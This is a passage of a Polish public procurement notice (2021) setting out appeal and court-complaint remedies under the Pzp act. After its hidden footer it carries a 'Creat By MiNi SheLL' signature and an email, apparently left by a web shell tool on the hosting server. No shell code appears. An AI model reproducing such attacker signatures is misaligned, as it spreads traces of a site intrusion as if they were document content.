organizacjom wpisanym na listę, o którejmowa w art. 469 pkt 15 ustawy Pzp oraz Rzecznikowi Małych i Średnich Przedsiębiorstw.3.Środkami ochrony prawnej, o których mowa w pkt 1 są:- odwołanie do Prezesa Krajowej IzbyOdwoławczej (art. 513 i nast. ustawy Pzp- skarga do Sądu Okręgowego w Warszawie (art. 579 inast. ustawy Pzp)4. Odwołanie przysługuje na:1.1. niezgodną z przepisami ustawy czynnośćZamawiającego, podjętą w postępowaniu o udzielenie zamówienia, o zawarcie umowy ramowej,dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie, w tym naprojektowane postanowienie umowy;1.2. zaniechanie czynności w postępowaniu o udzieleniezamówienia, o zawarcie umowy ramowej, dynamicznym systemie zakupów, systemiekwalifikowania wykonawców lub konkursie, do której Zamawiający był obowiązany na podstawieustawy;1.3. zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lubzorganizowania konkursu na podstawie ustawy, mimo że Zamawiający był do tegoobowiązany.5. Odwołanie wnosi się do Prezesa Izby w terminach wskazanych w art. 515 ustawyPzp.6. Skarga do sądu przysługuje na orzeczenie Izby oraz postanowienie Prezesa Izby, októrym mowa w art. 519 ust. 1 ustawy Pzp, stronom oraz uczestnikom postępowaniaodwoławczego w terminie 14 dni od dnia doręczenia orzeczenia Izby lub postanowienia PrezesaIzby, o którym mowa w art. 519 ust. 1 ustawy Pzp, przesyłając jednocześnie jej odpisprzeciwnikowi skargi. Skargę wnosi się za pośrednictwem Prezesa Izby.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com